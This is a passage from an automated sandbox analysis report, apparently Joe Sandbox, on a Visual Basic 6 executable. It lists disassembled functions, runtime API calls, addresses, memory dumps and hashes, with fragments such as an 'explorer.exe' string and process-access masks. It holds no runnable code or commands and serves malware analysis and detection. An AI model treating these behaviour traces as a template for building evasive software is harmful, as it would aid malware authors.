                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429ADB
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429AEC
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429AFA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00429B03
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00429B18
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00429B2C
                                                                                    • __vbaLenBstr.MSVBVM60(?), ref: 00429B43
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 00429B52
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 00429B63
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00429B6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429B7E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00429B8C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429BA8
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BC0
                                                                                    • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429BD1
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BDF
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429BE8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429C3B
                                                                                    • __vbaFreeStr.MSVBVM60(00429C84,?,?,?,?,00000000,004032B6), ref: 00429C6B
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C74
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C7D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$AnsiError$System$MoveUnicode$BstrCopy$#516#631List$Chkstk
                                                                                    • String ID: MGG$MGG$X1@
                                                                                    • API String ID: 3619963569-3990769864
                                                                                    • Opcode ID: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
                                                                                    • Instruction ID: cadc88f3378a5b8a7e488d7ed3a86a3d9527093b9cfaa094389870ae1251132b
                                                                                    • Opcode Fuzzy Hash: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
                                                                                    • Instruction Fuzzy Hash: 93D1ABB1900109EFDB04EFE0EE99EDEBB79EF48305F108169F602B6160DB756945CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004214E0 Relevance: 103.8, APIs: 69, Instructions: 297COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042153E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00421546
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042154A
                                                                                    • #648.MSVBVM60(0000000A,?,00000000), ref: 00421562
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00421571
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000000), ref: 00421583
                                                                                    • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000,?,00000000), ref: 0042158A
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421592
                                                                                    • #570.MSVBVM60(00000000,?,00000000), ref: 00421595
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215A2
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215C7
                                                                                    • #525.MSVBVM60(00000000,?,00000000), ref: 004215CE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 004215D9
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004215E1
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 004215E5
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004215ED
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 004215F6
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000), ref: 0042162F
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00421632
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 0042164F
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004217B1
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,00000000), ref: 004217BA
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004217BE
                                                                                    • __vbaPut3.MSVBVM60(00000004,?,00000000,?,00000000), ref: 004217C7
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 004217D5
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0042161E
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00421604
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421663
                                                                                    • #570.MSVBVM60(00000000,?,00000000), ref: 00421666
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421679
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 0042167D
                                                                                    • #648.MSVBVM60(0000000A,?,00000000), ref: 00421695
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004216A4
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000000), ref: 004216B0
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?,00000000), ref: 004216BA
                                                                                    • #525.MSVBVM60(00001000,?,00000000), ref: 004216C5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 004216D0
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004216D8
                                                                                    • #570.MSVBVM60(00000000,?,00000000), ref: 004216DB
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421712
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042171B
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421723
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042172C
                                                                                    • #598.MSVBVM60(?,00000000), ref: 00421744
                                                                                    • #525.MSVBVM60(-00000001,?,00000000), ref: 00421764
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0042176F
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421777
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421780
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421788
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421791
                                                                                    • #598.MSVBVM60(?,00000000), ref: 0042179E
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217E9
                                                                                      • Part of subcall function 00411210: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                      • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                      • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                      • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                      • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                      • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217FD
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421805
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042180E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 00421822
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042182D
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421830
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00421839
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042184F
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421858
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042185D
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421860
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00421869
                                                                                    • __vbaFreeStr.MSVBVM60(004218B2), ref: 004218A0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004218A5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004218AA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004218AF
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004218C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                    • String ID:
                                                                                    • API String ID: 936154001-0
                                                                                    • Opcode ID: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
                                                                                    • Instruction ID: 6fbf1135f095249bf70c03af9044da0b22cab9efce2ca8aeaf0a64a19547a855
                                                                                    • Opcode Fuzzy Hash: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
                                                                                    • Instruction Fuzzy Hash: B7B11B75E002589FCB04EFE4DE88AEEBBB9EF48341F10412AE506E72A4DB785945CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040DBF0 Relevance: 91.4, APIs: 49, Strings: 3, Instructions: 401COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DC0E
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,?,Function_000032B6), ref: 0040DC57
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DC66
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DC7E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DCA8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0040DCD1
                                                                                      • Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                      • Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,Function_000032B6), ref: 0040DD2F
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0040DD69
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040DD7F
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0040DD98
                                                                                    • #525.MSVBVM60(00000104), ref: 0040DDC1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DDCC
                                                                                    • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040DE03
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE42
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040DE5D
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040DE83
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040DE94
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040DEA9
                                                                                    • #616.MSVBVM60(?,?), ref: 0040DEBE
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DECC
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040DEE6
                                                                                    • #517.MSVBVM60(00000000), ref: 0040DEED
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DEF8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040DF0E
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DF22
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040DF58
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,Function_000032B6), ref: 0040DFC0
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DFDA
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040DFF5
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,?,Function_000032B6), ref: 0040DFFC
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,Function_000032B6), ref: 0040E027
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040E04A
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040E064
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0AB
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040E0C1
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0DA
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0040E0FE
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E182
                                                                                    • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040E19B
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040E1BA
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040E1CC
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E242
                                                                                    • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040E25A
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040E279
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040E28B
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • #598.MSVBVM60 ref: 0040E298
                                                                                    • __vbaFreeStr.MSVBVM60(0040E305), ref: 0040E2DD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0040E2F5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040E2FE
                                                                                      • Part of subcall function 0041A090: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
                                                                                      • Part of subcall function 0041A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
                                                                                      • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
                                                                                      • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
                                                                                      • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeMoveSystem$Copy$Ansi$Chkstk$Bstr$#525#580FileListUnicode$#570#600#616#648Open$#517#529#598BoundsConstruct2DestructGenerateGet3Get4Seek
                                                                                    • String ID: PR$ SE$>
                                                                                    • API String ID: 1583011778-1191765531
                                                                                    • Opcode ID: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
                                                                                    • Instruction ID: f905f382651ed8b103fe9430cada2d1d943483e90bd52cba87cb48a71c5da37b
